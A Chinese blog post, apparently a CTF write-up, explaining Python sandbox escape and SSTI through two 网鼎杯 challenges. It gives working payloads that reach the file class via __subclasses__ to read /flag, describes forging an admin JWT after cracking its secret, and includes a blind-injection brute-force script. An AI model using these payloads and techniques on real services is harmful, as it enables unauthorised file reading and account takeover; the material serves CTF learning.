php 沙箱逃逸,Python沙箱逃逸

最新推荐文章于 2024-05-31 09:32:38 发布
最新推荐文章于 2024-05-31 09:32:38 发布
阅读量228 收藏 1
点赞数
文章标签: php 沙箱逃逸

之前接触的大部分是PHP写的服务器端,而除了PHP,Python也可以作为服务器端的语言,利用的是Python的flask模块渲染html模板,同时也可能存在Python语句执行的漏洞,这就是SSTI漏洞,即服务器端模板注入,本篇文章通过网鼎杯的两道SSTI题简单学习了解一下Python沙箱逃逸的原理

网鼎杯第二场Web:calc

题目如下,是一个计算器,可以执行一些简单的算式,根据题目的提示,可能对我们的输入存在正则匹配过滤,需要我们注意正则表达式

df7f988b196f6085f1da1180bf779509.png

1^[0-9.]+\s*[*+-/]\s*[0-9.]+

这里的正则表达式存在两个问题

1.首先是[*+-/],我们知道’-‘在正则表达式里有特别的意义,表示范围,而在这里并没有被转义,说明是从’+’-‘/‘的字符

2.正则表达式并没有给出$结尾符,说明我们只需要符合前面的匹配,后面可以任意构造语句执行

我们可以试着访问index.php

出现了报错信息

4b30d9bb161a858a55356547d6639d60.png

从报错信息可以看出,这里是python写的web

这里先给出payload:

11+1,().__class__.__base__.__subclasses__()[40]('/flag').read()

e12d5172c96c2813a4fc572ffed8df48.png

下面我们在Python 2.7环境中一步步看看

1().__class__.__base__.__subclasses__()[40]('/flag').read()

为什么就能读取flag

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39>>>().__class__

>>>().__class__

>>>().__class__.__base__

>>>().__class__.__base__.__subclasses__

>>>().__class__.__base__.__subclasses__()

[, , ,

, , , , ,

oneType'>, , , ,

e 'xrange'>, , , , ,

, , , ,

set'>, , , ,

>, , , ,

method'>, , , ,

dictproxy'>, , ,

riptor'>, , , ,

e 'file'>, , , ,

'iterator'>, , ,

'>, , ,

nfo'>, , ,

eException'>, , ,

porter'>, , ,

WarningMessage'>, ,

ionGuard'>, , ,

assmethod'>, , ,

l.Container'>, , ,

'>, , , ,

'_sre.SRE_Pattern'>, , ,

'site.Quitter'>, ,

lDecoder'>, , ,

perator.methodcaller'>, , ,

pe 'MultibyteIncrementalEncoder'>, ,

MultibyteStreamReader'>, ]

>>> ().__class__.__base__.__subclasses__()[40]

>>>

我们可以发现

1().__class__.__base__.__subclasses__()[40]

返回的是file类型,我们在后面传入文件名,就相当于读取文件

这就是python沙箱逃逸的原理

网鼎杯第三场:mmmmy03d4f07d17208379bbf3660af872e3af.png

题目是一个登陆页面,随手试一下用户名test,密码test,成功登录,点击留言,提示只有admin用户才能留言,猜测必须用admin用户登陆,抓包观察

99b75d79728bcc1b06dc66a8c8c27078.png

bfbec9b30e33cc22f4dd76006abeb735.png

发现登陆时同时设置了cookie的token字段,而在此访问时,服务器根据token字段识别test用户,观察token值,是经过JWT加密后的值,首先使用 c-jwt-cracker 爆破 secret key,结果为

fcd209bd00812df99f96c8b2a0ebae2f.png

加密后的token值替换原本test的token值伪造admin用户登陆

3e1d3729be81608202d1a4c885b8abe1.png

然后这里的留言post的text存在SSTI漏洞,但是这里过滤了双花括号的写法,我们可以换成流程控制结构的写法 执行语句 ,测试如下:

e853c4aca2949da7e499c7f03f332b99.png

fa41c9cf8dadd782b8cfdc216802180e.png

后面的数据就要依靠盲注出来了

1text={% if ().__class__.__base__.__subclasses__()[40]('/flag').read()[0]=='f' %}1{% else %}0{% endif %}

但是这里还过滤了一些关键字,例如’_’,所以我们可以将这些关键属性class,base等放入别的参数,从而绕过对text参数过滤

使用payload如下:

1text={% if request.values.e[18] == ()[request.values.a][request.values.b][request.values.c]()[40](request.values.d).read()[0] %}good{% endif %}&a=__class__&b=__base__&c=__subclasses__&d=/flag&e=}-{0123456789abcdefghijklmnopqrstuvwxyz

脚本如下:

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35import requests

url = "http://0fe97b99c09c4a1cbf5eb0610879c4e93f084e23d438487d.game.ichunqiu.com/bbs"

all_string = "}-{0123456789abcdefghijklmnopqrstuvwxyz"

flag = ""

cookie = {

"token" : "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.IXEkNe82X4vypUsNeRFbhbXU4KE4winxIhrPiWpOP30"

}

for i in range(100):

f = 1

for j in range(39):

print('checking '+all_string[j])

data = {

'text':"{%% if request.values.e[%d] == ()[request.values.a][request.values.b][request.values.c]()[40](request.values.d).read()[%d] %%}good{%% endif %%}"%(j,i),

'a':'__class__',

'b':'__base__',

'c':'__subclasses__',

'd':'/flag',

'e':all_string

}

r = requests.post(url=url,data=data,cookies=cookie)

if 'good' in r.text:

flag = flag + all_string[j]

print('the '+str(i)+' place of flag is: '+all_string[j])

break

elif 'good' not in r.text and j == 38:

f = 0

break

if f == 0:

break

print('flag: ' + flag)

#flag: flag{49ec4dfd-6600-4651-a5ff-9c190562991f}

科技狂潮
关注
LNMP虚拟主机PHP沙盒逃逸
Coisini的博客
06-12 411
并不只是针对Lnmp的沙盒逃逸,而是.user.ini的设计缺陷达到绕过open_basedir限制,所以是通用的方法。首先来看看最新版LNMP是怎么配置open_basedir的: open_basedir=/home/wwwroot/default:/tmp/:/proc/ lsattr .user.ini ----i----------- .user.ini LNMP的open_ba...
python沙箱逃逸小结
sectown的博客
02-27 779
之前,协会的同学去天津交流,天津大学的同学讲了一个python沙箱逃逸的案例。今天结合之前的所学和比赛经验写一个小结。 案例1这是hackuctf 2012的一道题 defmake_secure(): UNSAFE = ['open', 'file', 'execfile', ...
php 沙箱逃逸,Python沙箱逃逸之基础篇
weixin_42299244的博客
03-28 357
0x01 前言周末去参加了一波国赛的半决赛,发现全部都是python的题,之前还以为会有人把模版改成php的呢,结果都没有。。对于python也不是很熟悉,所以回来之后学习一下。0x02 Python一般的利用方式一般python沙箱的话都是可以执行python命令的一个环境,因此我们需要知道一些敏感的函数来帮助我们getshell或者读取敏感文件等等执行系统命令12345os.system('w...
php 沙箱逃逸,浅析Python SSTI/沙盒逃逸
weixin_39535283的博客
03-28 667
前言之前也接触过什么是SSTI,但大多以题目进行了解,很多模块以及payload都不了解其意就直接拿过来用,感觉并没有学到什么东西,最主要的是在绕过的过程中,不清楚原理没有办法构造,这次就好好来学习一下原理以及姿势一、基础知识0x00:沙盒逃逸沙箱逃逸,就是在一个代码执行环境下(Oj或使用socat生成的交互式终端),脱离种种过滤和限制,最终成功拿到shell权限的过程0x01:python的内建...
php 沙箱逃逸,python沙箱逃逸小结
weixin_29944865的博客
03-28 139
之前碰到了flask模板的漏洞的时候接触过python的一些东西,之前没时间去细看,现在看感觉很强悍,简单总结一下首先我们不说原理了,也不是太明白,我们直接讲利用,一些python好玩的特性1.内联函数python的内敛函数真是强大,可以调用一切函数做自己想做的事情__builtins____import__我们输入dir('builtins')发现如下 我们在python的object类中集...
Python沙箱逃逸
qq_36511916的博客
12-29 574
案例1 def make_secure(): UNSAFE = ['open', 'file', 'execfile', 'compile', 'reload', '__import__', 'e...
Python沙箱逃逸总结
forbidd3n,keep going
07-26 2096
0x00 简介 关于Python沙箱逃逸,在多次CTF比赛中看到后,终于下定决心来进行一番学习和总结。 python沙箱逃逸:从一个受限制的python执行环境中获取到更高的权限,甚至getshell。 0x01 __builtins__ 首先我们从python的内建函数__builtins__说起。通过dir(__builtins__)可以查看内置函数,展示所有内置类型和函数。 ...
沙箱逃逸练习题python源码
02-13
里面是近十道python逃逸题目的python源码,在python环境中运行既可以进入题目环境。 可以查看我写的沙箱逃逸的博客结合练习 https://blog.csdn.net/qq_43390703/article/details/104256001
Python沙箱逃逸练习题源码解析与实践
资源摘要信息: "沙箱逃逸练习题python源码" 沙箱逃逸是指在沙箱环境中运行的程序,试图绕过沙箱的限制,访问或控制沙箱外的系统资源。这种技术常被用于网络安全攻防演练中,以测试沙箱的安全性。在CTF(Capture The...
python沙盒逃逸
Lethe's Blog
08-13 2373
0x01 简单介绍 python沙盒逃逸就是通过绕过种种过滤和限制,拿到本不应获取的一些“危险函数",或者绕过Python终端达到命令执行的效果。 0x02 常用备忘录 (1)func_globals 用法:function.func_globals 作用:返回包含函数全局变量的字典的引用——定义函数的模块的全局命名空间。 >>> def test():pass ... &gt...
Python沙箱逃逸终极指南:安全漏洞分析和解决方案一网打尽
Rocky006的博客
01-16 2060
Python 是一种强大而灵活的编程语言,但在某些情况下,可能需要运行不受信任的代码,同时又希望限制它的行为,以防止对系统的不良影响。这时,Python 沙箱就成为一种有用的工具,它可以帮助你在安全的环境中运行不受信任的代码。本文将探讨 Python 沙箱的概念、常见的沙箱技术以及如何避免沙箱逃逸
php开源沙箱,PHPSandbox - 一个基于PHP沙箱环境拥有全套配置和验证选项
weixin_39863155的博客
03-10 1091
A full-scale PHP 5.4+ sandbox class that utilizes PHP-Parser to prevent sandboxed code from running unsafe code.It also utilizes FunctionParser to disassemble callables passed to the sandbox, so that...
php开源沙箱,知名沙盒软件Sandboxie正式开源
weixin_29807369的博客
03-10 279
Will Sophos take ownership of the open source project?Sophos is currently engaging with members of the community who are willing to take on the Sandboxie source code and make it available through an o...
一文看懂Python沙箱逃逸
良知犹存的博客
12-19 956
让用户提交 Python 代码并在服务器上执行,是一些 OJ、量化网站重要的服务,很多 CTF 也有类似的题。为了不让恶意用户执行任意的 Python 代码,就需要确保 Python 运行在沙箱中。沙箱经常会禁用一些敏感的函数,例如 os,研究怎么逃逸、防护这类沙箱还是蛮有意思的。
python沙箱逃逸总结
weixin_44576725的博客
04-14 4161
python沙箱逃逸总结 让用户提交 Python 代码并在服务器上执行,是一些 OJ、量化网站重要的服务,很多 CTF 也有类似的题。为了不让恶意用户执行任意的 Python 代码,就需要确保 Python 运行在沙箱中。沙箱经常会禁用一些敏感的函数,例如 os,研究怎么逃逸、防护这类沙箱还是蛮有意思的。 前言 Python沙箱逃逸的最终目标就是执行系统任意命令,次一点的写文件,再次一点的读文件。 顺便安利一本书:《流畅的 Python》。这本书有很多中高阶知识点,很全面而且讲的很清楚,如果你看过,相
php沙箱支付 最简单
孤单的时候狗作陪!的博客
11-29 337
1.支付宝开放平台注册账号开启沙箱服务 2.能力管理,支付能力下载的SDK插件解压放到public/plugins文件夹下 1.开启沙箱 2.找到沙箱应用获取appid,秘钥等,点击查看可以查看秘钥信息 3.全局配置文件config中配置以下代码段 //支付方式 'pay_type' => [ 'alipay' => ['pay_code'=>'alipay', 'pay_name'=>'支付宝', 'logo'=>'/static/home/..
推荐一个安全的PHP沙箱执行环境:PHPSandbox
最新发布
gitblog_00001的博客
05-31 534
推荐一个安全的PHP沙箱执行环境:PHPSandbox 去发现同类优质开源项目:https://gitcode.com/ 项目介绍 PHPSandbox是一个强大的PHP 5.3.2+版本的沙箱类库,它利用Nikic的PHP-Parser来阻止在沙箱环境中运行不安全的代码。此外,它还结合了jeremeamia的FunctionParser,使得PHP可调用对象也能在沙箱中安全地运行而无需先转换为...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值